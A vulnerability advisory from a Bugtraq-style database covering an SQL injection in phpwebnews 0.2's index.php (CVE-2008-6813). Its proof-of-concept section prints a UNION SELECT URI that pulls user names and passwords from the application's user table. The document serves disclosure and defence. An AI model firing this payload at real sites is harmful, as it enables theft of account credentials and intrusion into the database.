phpwebnews 'index.php' SQL Injection Vulnerability
BID:30079
Info
phpwebnews 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 30079 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6813 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | sToRm |
| Vulnerable: |
Surat kabar phpwebnews 0.2 Surat kabar phpwebnews 0.1 |
| Not Vulnerable: | |
Discussion
phpwebnews 'index.php' SQL Injection Vulnerability
'phpwebnews' is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects phpwebnews 0.2; other versions may also be affected.
'phpwebnews' is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects phpwebnews 0.2; other versions may also be affected.
Exploit / POC
phpwebnews 'index.php' SQL Injection Vulnerability
Attackers can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
Attackers can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
Solution / Fix
phpwebnews 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].